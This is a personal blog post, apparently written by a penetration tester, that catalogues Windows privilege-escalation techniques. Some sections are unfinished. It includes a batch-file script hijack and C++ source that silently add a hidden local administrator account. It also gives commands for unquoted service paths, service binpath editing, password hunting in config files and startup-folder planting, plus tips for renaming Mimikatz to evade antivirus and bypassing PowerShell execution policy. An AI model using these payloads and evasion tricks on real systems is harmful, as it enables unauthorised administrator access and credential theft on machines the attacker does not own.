Thursday 5 April 2018

Windows Privilege escalation

This will likely be an entry I will keep coming back to and updating as I find new tricks that actually work.
First some links with some good primers;
A big list of vectors
Some good walkthroughs;
Finally something that gave me good ideas, I will expand upon these below. I couldn't get this to work due to missing DLL entrypoints on my chosen exe's;

I am making this blog post as a reference for myself and others, and it'll be long, so I am trying out a table of contents;

Table of Contents

Recon and Scanning

Passive and active recon and scanning for windows privilege escalation takes a lot of forms. I am going to assume you've already found your way onto a host. If not you can do this through packet sniffing, some social engineering, or a leg-up in your red team engagement... I will probably do an article just on this later.

I am a fan of living off the land. Use the tools that are already installed. There are some that will make this easy, but could increase the likelihood of getting caught or simply not work due to app-whitelisting etc.

Look on the root of the drives with; icacls c:\* /C
You are looking for the below, (modify, Write and Full control respectively, obviously a group your account is a member of)
NT AUTHORITY\Authenticated Users:(M)
or either of those with a (F)

Then you'll need to got through subdirectories in a similar fashion. You can add a /T, but it makes it hard to find write locations with too much info.

The other option here is to use a tool from Microsoft's Sysinternals called accesschk. I've found some interesting behavior between the -d (directory) and without the -d. Without the -d it will find folders on the root of the drive.

accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -kwsu hklm\system\currentcontrolset\services #look for writeable reg keys for services, to add your process.

It might be easier here to look for other files;
accesschk.exe -uwqs Users c:\*.bat
accesschk.exe -uwqs Users c:\*.cmd
accesschk.exe -uwqs Users c:\*.dll
accesschk.exe -uwqs Users c:\*.ini

There are lots of ways to escalate privileges on Windows... like a lot. But this one I wanted to put first though, as it isn't one I've seen before... it is so simple I am not sure why. I don't know if this has a name, but as I was also looking at an application that was vulnerable to DLL hijacking when I discovered it, so I've simply called it this (if it is known as something else let me know);


Script Hijacking

To understand this, you need to know how windows calls processes. As in some of the other attacks, it is all about local directory first, then the path variable is used from left to right. If you do an echo %path% you get the following;
C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;. If you have write access to that first directory you are golden, but you can keep going down the list, as long as it is a exe or script that doesn't exist in one of these other folders, you are in. You don't even have to use an exe here, a batch file, or cmd will work.

This attack exploits the path windows takes by simply beating out finding the real executable, go for the local path first.

If you find a script calls another executable and you have write access in the directory that script resides then depending on how that script is called, you could get yourself privilege escalation. Eg if you find an everyone writable directory, and inside is a startup.bat, restart.cmd or similar, and inside that user readable batch file is a call to timeout, ping, taskkill etc, and you have write access to that directory you can add a batch file called that process (eg taskkill.bat) and pass on the commands that were being sent to the true process via the full path (just to be nice so their script doesn't bomb), eg;

I found startup.bat in c:\somefolder, I have create/append to this folder, but the files themselves are marked as read only.
Inside startup.bat is a bunch of things, mainly setting some paths and variables. At the bottom of this script it calls the actual exe that is the same folder. I assume this script is run in group policy or as a scheduled task, or hardcoded to run from another executable. I didn't have local admin, but I can see the server is listening on the port that is defined in one of the variables... a good sign the exe is called with admin or system.
Just above the exe being run is;
timeout /t 5

Awesome. I don't have write to the startup.bat, but I do to the c:\somefolder (of course I could have just echo'd out path and hit one of those directories). I create a file called timeout.bat and make it hidden. Inside timeout.bat I put the below. The nice thing about the below... you can put it in any type of call, ping, tskill, taskkill, cscript, wscript etc... basically anything that has an exe in c:\windows\system32 and it will still run that bit, so no one will likely be any the wiser as the script will still work. It also gives us some details on what called it, when, and with which user.

@echo off
c:\windows\system32\%~n0.exe %1 %2 %3 %4 %5
echo %username% %time% %date% %1 %2 %3 %4 %5 %~dpnx0 >> C:\users\myuser\%~n0.txt

net user ms-admin PW-Privesc#1 /add ", 0);
net localgroup Administrators ms-admin /add

Wait for next reboot, or in my case when the scheduled task ran and likely you'll have a shiny new local admin to use, if not at least you'll have the username your script was called with. In my case, less than an hour later I had local admin.


Exploiting the path

This one should probably go to the top as all the others use this trick. But essentially the %path% variable, is a system and user variable that is used for windows to find executables, dll's and scripts.


Nltest hash passing

Stolen from here
Basically Nltest /server:ip-of-kali-box /query


Dll Hijacking

This is mentioned here
I initially had issues getting this to work, but we press on.

Essentially you want to find a folder that your have write to that has an EXE that is being called by an administrative user. Eg a service. Then you need either write access to that folder, or one of the folders in the system path. Then you need to find a DLL's that your target exe is calling. If that DLL doesn't exist in the local directory and you have write, put it there. If it doesn't exist on the system at all, you just need to put it in the path folder you have write to.

This is the dll I found through using dependency walker and filemon. Winmm.dll, is a pretty common DLL for dll hijacking, so it is useful to have one. Once the vendor responds I'll put my working code below and on my github for reference. I eventually found this one, that gave me some ideas;
But this is the one along with some stuff I picked up along the way cinched it;

Here is my final one; There are some big apps that are vulnerable to this, including the server-side implementation of NodeJs.exe. I've reported this to the node team in April 2018, but they've not prioritised it as a big issue.


Unquoted Paths

This one is kinda fun. Essentially you are looking for a service or even something likely to be run as admin\system that has a space in the path and no quotes around it. So a lnk file, or a service are your best bet.

Run the below to find a service that is vulnerable;
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Lets say it returns c:\program files\secure service\version 12\service.exe. Then you simply need to create an exe that takes the name of one of the folders before it's space, depending on where you have write access. Say you have write access to c:\ you could simply drop in a program.exe and see what you catch... likely something. The system will alert users to this files existence too.
Most likely though you won't have write to c:\ but you may to "c:\program files\", so you could in the above case put an exe in there called secure.exe, further still in the above case you could put version.exe in c:\program files\secure service\ and get the same result.
I used to use iexpress for this, but in my testing it doesn't like having more commands thrown at it, eg calling c:\program files errors out trying to call the program.exe with "files".
Bat2Exe is good;, however a lot of AV will tend to pick files converted in this way up.
So fire-up notepad++ and save the following into a file called exe-test.cpp, should compile with MinGW-w64

/* Author: Morgan Storey (@MorganKStorey)
g++ -c exe-test.cpp & g++ -o test.exe exe-test.o
Really simple, just adds a local admin.
To do, add output to a log file so you can see what user etc called it... knowledge is power
#include <windows.h>
int main(void)
 WinExec("cmd.exe /c net user ms-admin PW-PrivEsc#1 /add ", 0);
 WinExec("cmd.exe /c net localgroup Administrators ms-admin /add ", 0);
         return 0;

Git here;


Service editing

For this you are going to have to use a 3rd party tool, though it is made by sysinternals, now owned by Microsoft, so I doubt it'll get picked up;
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Everyone" * /accepteula

You can also just open regedit and go to the below section of the registry, sometimes the registry permissions are changed and even if you don't have the permissions above you have them in the registry.

The plan here of course is to edit a service and run the command you need.
Something like sc config VulnerableService binpath= "cmd /c
net localgroup Administrators youruser /add" #note the space after the = symbol.
Or just change the binpath in the registry and then wait for the service to start. Now you have a shiny new admin to do bad with.


Other poor permissions I've seen and used



Used to be pretty common in the WinXP days to find the startup folder for all users be set to all users having write access. Not so much with Win7+
But have a look here, C:\Users\Public\Desktop\ if you have write you could modify an existing LNK file to point to a script or exe you need the admin to run... basically fishing at this point. Or better yet put it in the all users startmenu; C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup and when/if they logon you are good.


App Folders

Specific app folders like c:\python, c:\java, cygwin etc, are rife with these.


Sysprep hangovers

XML files, look through them for passwords etc. At most they'll be encoded. Their can be autologin users in the registry too.


Poor Config files

findstr /si password *.txt *.ini *.log *.xml *.cfg *.conf
findstr /si administrator *.txt *.ini *.log *.xml *.cfg *.conf


Scheduled Tasks 

By default scheduled tasks have an ACL that locks them down to the creator. Sometimes people will break this and give you an in to repoint the task to your own script, or simply replace the script it is point to.


Startup items

Like the title says, startup scripts, etc. 
These are super easy. Look for scripts referenced to the local policy, in the startup folder in the user profiles, even desktop.ini in folders can be used to leverage this.


Driver hooking

Work in progress


3rd Party tools

I love "living off the land", but sometimes you need a 3rd party tool as nothing else works.



There are lots of 0-day and responsibly disclosed bugs with tools to techniques exposed on how to do privilege escalation in windows.
Tavis Ormandy dropped this as it was patched in August 2019, of course patches aren't always installed soooo

SandboxEscaper has unfortunately taken down all her POC's but they were all patched too, after she dropped them on Twitter.
Her original github here;


Pcap/Wireshark etc

Yep there are vulnerabilities in Wireshark. But here I am more talking about setting up a capture to capture a user with higher privileges username and password, more doable than most realise. Especially when Winpcap now helpfully adds the tickbox, would you like other users to be able to run the service.



First you're likely going to need to know how to bypass execution policy... there are loads of ways (or the old "powershell –ExecutionPolicy Bypass".
Then you'll need to bypass Mimikatz being detected by can literally just go through the codebase before you compile your custom version and find/replace katz for dogz to get past most signature based av.



Work in progress


Work in progress  


Work in progress


This one only works when the patch for MS12-042 hasn't been applied. has a good rundown, essentially hook a running process to get into ring0 and run your command prompt there. Do a tasklist and find an explorer.exe, if its pid is 1234 run; sysret -pid 1234


These technically aren't privilege escalation, they are a way to move laterally. But putting them here as they work. I will likely split this out into a separate blog post.

Terminal services

This involves taking over another users session.
Work in progress


Work in progress

No comments:

Feel like donating to me, Bitcoin; 1BASSxgFZ2j8VfXFrWJHNvYdQXDtJKAUuN or Ethererum; 0x2887D4B4fe1a7162D260CeA7E1131AF8926bd87F